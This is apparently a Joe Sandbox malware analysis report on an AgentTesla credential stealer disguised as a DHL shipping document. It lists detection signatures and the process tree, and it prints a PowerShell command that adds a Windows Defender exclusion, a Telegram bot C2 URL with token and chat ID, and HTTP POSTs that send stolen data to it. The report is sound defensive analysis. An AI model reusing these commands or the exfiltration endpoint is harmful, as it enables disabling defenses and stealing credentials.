Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documents Of DHL -BL- AWB- 8976453410.exe

Overview

General Information

Sample name:Documents Of DHL -BL- AWB- 8976453410.exe
Analysis ID:1446731
MD5:5f73c9853e26a72d00acb018db8a9175
SHA1:62b92ce12a85ef418deed00c907d32660162c9e1
SHA256:e470ca1515de30d455b70bdeef3b2d1cc9a479f66e245843c0a235e6f0859943
Tags:AgentTeslaDHLexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Disables UAC (registry)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Documents Of DHL -BL- AWB- 8976453410.exe (PID: 3812 cmdline: "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" MD5: 5F73C9853E26A72D00ACB018DB8A9175)
    • powershell.exe (PID: 4104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 432 cmdline: C:\Windows\system32\WerFault.exe -u -p 3812 -s 1324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendMessage?chat_id=7153133538"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x338ba:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3392c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x339b6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x33a48:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33ab2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x33b24:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33bba:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x33c4a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 15 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe", ParentImage: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe, ParentProcessId: 3812, ParentProcessName: Documents Of DHL -BL- AWB- 8976453410.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, ProcessId: 4104, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe", ParentImage: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe, ParentProcessId: 3812, ParentProcessName: Documents Of DHL -BL- AWB- 8976453410.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, ProcessId: 4104, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe", ParentImage: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe, ParentProcessId: 3812, ParentProcessName: Documents Of DHL -BL- AWB- 8976453410.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force, ProcessId: 4104, ProcessName: powershell.exe

                      Snort Signatures

                      Timestamp:05/23/24-20:23:48.252165
                      SID:2851779
                      Source Port:49702
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendMessage?chat_id=7153133538"}
                      Source: RegAsm.exe.5896.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendMessage"}
                      Multi AV Scanner detection for submitted file
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeReversingLabs: Detection: 28%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for sample
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeJoe Sandbox ML: detected

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents Of DHL -BL- AWB- 8976453410.exe PID: 3812, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49734 version: TLS 1.2
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.pdbP source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb0 source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdbH source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.pdb@ source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Dynamic.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbh source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49702 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b33f5530afbHost: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b434f66dbb2Host: api.telegram.orgContent-Length: 918Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc89d04dab1caeHost: api.telegram.orgContent-Length: 66933Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8bd66cafcc93Host: api.telegram.orgContent-Length: 66933Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc91e70aa5adefHost: api.telegram.orgContent-Length: 66933Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc93c33507ca83Host: api.telegram.orgContent-Length: 66933Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc96187756500aHost: api.telegram.orgContent-Length: 66933Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc98fdd89be5d8Host: api.telegram.orgContent-Length: 66933Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9dbc499ffdb5Host: api.telegram.orgContent-Length: 66941Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca0ea8225d491Host: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca602c64eb6f3Host: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca8e23f703ee1Host: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcab1c436261e3Host: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcadba5a9e9843Host: api.telegram.orgContent-Length: 66941Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb3cc81a7aaceHost: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb6faaaa8a6a3Host: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb90630e83599Host: api.telegram.orgContent-Length: 66941Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbb11fbe5cf9bHost: api.telegram.orgContent-Length: 66941Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbd1cc2b54c1fHost: api.telegram.orgContent-Length: 71868Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc1491e544297Host: api.telegram.orgContent-Length: 66941Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc94f27781fa4Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd1385623294aHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd4fd1774ca5eHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcd88e9847228cHost: api.telegram.orgContent-Length: 67141Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcdb4778e8706bHost: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b43a2c5ed73Host: api.telegram.orgContent-Length: 66944Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b33f5530afbHost: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
                      Source: RegAsm.exe, 00000004.00000002.3680847328.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000342C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000348F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000036BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: RegAsm.exe, 00000004.00000002.3680847328.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: RegAsm.exe, 00000004.00000002.3680847328.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000342C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000348F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003322000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003261000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/
                      Source: RegAsm.exe, 00000004.00000002.3680847328.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000342C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000348F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.000000000365A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.0000000003322000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3680847328.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
